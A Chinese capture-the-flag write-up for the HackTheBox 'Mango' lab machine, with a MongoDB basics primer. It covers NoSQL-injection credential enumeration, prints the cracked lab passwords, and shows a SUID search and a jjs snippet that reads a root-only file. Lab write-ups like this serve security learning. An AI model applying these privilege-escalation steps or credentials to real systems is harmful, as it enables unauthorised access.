【HTB】Mango

暂时最后一个 HackTheBox(之前的存货)

做起来实在头疼,连接太慢,等到自闭

后面就做 vulnhub 的了

这个靶机,巨慢

但是另外了解了一些 NoSQL 的知识就补充在文章里面了

语雀可能阅读体验更好一点

https://www.yuque.com/hxfqg9/bt9vi8/ub1ewz

https://www.yuque.com/hxfqg9/bt9vi8/tp9x81

Nosql/MangoDB基础

NoSQL(NoSQL = Not Only SQL ),意即"不仅仅是SQL"。

NoSQL 是指非关系型数据库,用于超大规模的数据管理,这类数据不需要存储不需要固定的格式,无需多余操作就能横向扩展

MongoDB 将数据存储为一个文档,数据结构由键值(key=>value),组成,MongoDB 文档类似于 JSON 对象,字段值可以包含其他文档、数组、文档数组

对比一下:

基础命令

创建数据库:use database_name,如果有直接拿来用,没有会自动创建 use yichen

删除数据库:db.dropDatabase() 先 use 再删除

创建集合(相当于 mysql 中的表):db.createCollection('hack')

删除集合:db.hack.drop()

查看集合用的是:show tables 或者 show collections

插入数据:db.yichen.insert({'name':'yichen'})

插入数据用逗号隔开:

db.writeup.insert({name:'yichen',
    date:'2020-3-11',
    tags:'web',
    flag:'flag{dhcbuyebcadwe}',
    blog:'https://www.yuque.com/hxfqg9'})

也可以先把数据定义为一个变量再插入到文档里

更新:

db.writeup.update({name:'yiyichen'},{$set:{name:'y1chen'}})

会把 name 为 yiyichen 的 name 改为 y1chen

pretty() 可以更加美观的显示结果

移除文档:db.writeup.remove({'name':'y1chen'})

and 条件(多个条件用逗号隔开):

db.writeup.find({key1:value1, key2:value2}).pretty()

or 条件:

db.writeup.find({$or:[{"name":"yichen"},{"name": "yiyichen"}]}).pretty()

Mango靶机

nmap扫描端口

同时发现了一个网址:在 443 端口 staging-order.mango.htb

vim /etc/hosts,把 hosts 改一下

10.10.10.162   staging-order.mango.htb

访问得到一个登录框

有个专门爆破 nosql 用户名和密码的脚本:

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

太慢了,就直接用大佬的结果了

mango:h3mXK8RhU~f{]f5H admin:t9KcS3>!0B#2

可以直接用 ssh 登录到 mango

ssh mango@10.10.10.162

su admin 切换到 admin 用户,在 admin 的目录下面找到 user.txt

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

可以发现 jjs 是用 root 运行的

运行 jjs

这样输入:

var filename = "/root/root.txt";
var content = new java.lang.String(
                   java.nio.file.Files.readAllBytes(
                     java.nio.file.Paths.get(filename)
                   )
                 );
print(content)

就可以拿到 root.txt

实在是佩服这个网,连不上,不截图了,也没发交 flag 了 Orz

参考:

https://rmccarth.info/post/htb/mango/

本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115),作者:yichen

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-03-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 一些常识(ssh/docker/ftp)

    cxt65U8MP/XOzyxCsBSR7/kwxvsYmOl/Hgr/Mjs0FZ4,确定想要继续连接吗?

    yichen
  • ret2_dl_runtime_resolve笔记

    之前在 动态链接 提到过,程序使用 ret2_dl_runtime_resolve 来进行延迟绑定的时候重定位的

    yichen
  • 逆向一期/011/BC++程序脱壳后打不开

    yichen
  • Docker教程06:镜像管理和创建

    当运行容器时,使用的镜像如果在本地中不存在,docker 就会自动从 docker 镜像仓库中下载,默认是从 Docker Hub 公共镜像源下载.下面我们来学...

    mojocn
  • ROS2机器人笔记20-07-24

    ROS2的开发存在一个“鸡与蛋”问题,先后问题。ROS的最重要组成部分是生动活跃的软件包生态系统,因为引入支持各种传感器和机器人的现成软件包的能力为机器人专家带...

    zhangrelay
  • 我用Flask写了一个图书作者管理项目(附完整代码)

    这次给大家带来的是一个非常小的Flask案例,刚好也与我们之前学习的Flask知识紧紧相结合。

    Python进击者
  • 英特尔机器人操作系统二项目-Intel ROS2 Projects

    原文链接:https://index.ros.org/doc/ros2/Related-Projects/Intel-ROS2-Projects/

    zhangrelay
  • “萌物”驾到!波士顿动力公布新机器人SpotMini

    镁客网
  • 我是如何找到Donald Daters应用数据库漏洞的

    星期一的晚上像往常一样我通过观看电视节目来打发时间,但并没有什么有趣的节目。于是我决定在手机上寻找乐趣,我开始漫无目的在Twitter上翻看各种推文,一条Fox...

    FB客服
  • 【实战】用OpenCV实现页面扭曲矫正

    今天要分享的内容是关于页面扭曲矫正的内容,为了让大家有一个相关的概念,下面先预览一下效果图

    小白学视觉

扫码关注云+社区

领取腾讯云代金券